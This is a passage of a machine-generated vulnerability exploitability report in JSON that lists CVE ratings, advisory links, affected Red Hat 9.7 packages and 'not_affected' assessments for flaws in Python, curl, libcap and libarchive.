}, { "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/JQDUNJVB4AQNTJECSUKOBDU3XCJIPSE5/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4786" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-4786" } ], "published": "2026-04-13T22:16:30+00:00", "updated": "2026-04-29T16:16:26+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n linux-vdso.so.1 (0x0000ffff8cd00000)\n libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)" } }, { "id": "CVE-2026-4873", "ratings": [ { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "description": "A flaw was found in curl. A remote attacker could exploit this by initiating an unencrypted connection (via IMAP, SMTP, or POP3) and then making a subsequent request to the same host that requires Transport Layer Security (TLS). Due to incorrect connection reuse, the subsequent request would bypass the TLS requirement, leading to the transmission of sensitive information in cleartext. This vulnerability, categorized as Cleartext Transmission of Sensitive Information (CWE-319), results in information disclosure.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-4873" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-4873" }, { "url": "https://curl.se/docs/CVE-2026-4873.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4873" }, { "url": "https://ubuntu.com/security/notices/USN-8227-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-4873" } ], "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-4878", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "nvd" }, "score": 7, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 6.7, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "source": { "name": "rocky" }, "severity": "high" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 367 ], "description": "A flaw was found in libcap. A local unprivileged user can exploit a Time-of-check-to-time-of-use (TOCTOU) race condition in the `cap_set_file()` function. This allows an attacker with write access to a parent directory to redirect file capability updates to an attacker-controlled file. By doing so, capabilities can be injected into or stripped from unintended executables, leading to privilege escalation.", "recommendation": "Upgrade libcap to version 2.48-10.el9_7.1", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-4878" }, { "url": "http://www.openwall.com/lists/oss-security/2026/04/07/14" }, { "url": "http://www.openwall.com/lists/oss-security/2026/04/07/4" }, { "url": "http://www.openwall.com/lists/oss-security/2026/04/08/9" }, { "url": "http://www.openwall.com/lists/oss-security/2026/04/09/5" }, { "url": "http://www.openwall.com/lists/oss-security/2026/04/09/6" }, { "url": "https://access.redhat.com/errata/RHSA-2026:12423" }, { "url": "https://access.redhat.com/errata/RHSA-2026:12441" }, { "url": "https://access.redhat.com/errata/RHSA-2026:13285" }, { "url": "https://access.redhat.com/errata/RHSA-2026:14162" }, { "url": "https://access.redhat.com/errata/RHSA-2026:14937" }, { "url": "https://access.redhat.com/errata/RHSA-2026:7473" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-4878" }, { "url": "https://bugzilla.redhat.com/2451615" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447554" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451615" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4878" }, { "url": "https://errata.almalinux.org/9/ALSA-2026-12441.html" }, { "url": "https://errata.rockylinux.org/RLSA-2026:12441" }, { "url": "https://github.com/AndrewGMorgan/libcap_mirror/security/advisories/GHSA-f78v-p5hx-m7hh" }, { "url": "https://linux.oracle.com/cve/CVE-2026-4878.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-13285.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4878" }, { "url": "https://sites.google.com/site/fullycapable/release-notes-for-libcap#h.x4zn8j3lss6r" }, { "url": "https://ubuntu.com/security/notices/USN-8193-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-4878" } ], "published": "2026-04-09T16:16:31+00:00", "updated": "2026-05-07T22:16:36+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.48-10.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n linux-vdso.so.1 (0x0000ffff8cd00000)\n libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)" } }, { "id": "CVE-2026-5121", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "high" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 7.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "rocky" }, "severity": "high" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 190 ], "description": "A flaw was found in libarchive. On 32-bit systems, an integer overflow vulnerability exists in the zisofs block pointer allocation logic. A remote attacker can exploit this by providing a specially crafted ISO9660 image, which can lead to a heap buffer overflow. This could potentially allow for arbitrary code execution on the affected system.", "recommendation": "Upgrade libarchive to version 3.5.3-9.el9_7", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-5121" }, { "url": "https://access.redhat.com/errata/RHSA-2026:10065" }, { "url": "https://access.redhat.com/errata/RHSA-2026:10097" }, { "url": "https://access.redhat.com/errata/RHSA-2026:11768" }, { "url": "https://access.redhat.com/errata/RHSA-2026:12071" }, { "url": "https://access.redhat.com/errata/RHSA-2026:12274" }, { "url": "https://access.redhat.com/errata/RHSA-2026:13812" }, { "url": "https://access.redhat.com/errata/RHSA-2026:14937" }, { "url": "https://access.redhat.com/errata/RHSA-2026:16174" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8510" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8517" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8521" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8534" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8864" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8866" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8867" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8873" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8908" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8944" }, { "url": "https://access.redhat.com/errata/RHSA-2026:9026" }, { "url": "https://access.redhat.com/errata/RHSA-2026:9592" }, { "url": "https://access.redhat.com/errata/RHSA-2026:9832" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-5121" }, { "url": "https://bugzilla.redhat.com/2449006" }, { "url": "https://bugzilla.redhat.com/2452945" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449006" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452945" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4424" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5121" }, { "url": "https://errata.almalinux.org/9/ALSA-2026-8510.html" }, { "url": "https://errata.rockylinux.org/RLSA-2026:8510" }, { "url": "https://github.com/advisories/GHSA-2vwv-vqpv-v8vc" }, { "url": "https://github.com/libarchive/libarchive/pull/2934" }, { "url": "https://linux.oracle.com/cve/CVE-2026-5121.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-8534.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5121" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-5121" } ], "published": "2026-03-30T08:16:18+00:00", "updated": "2026-05-12T10:16:47+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.5.3-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": 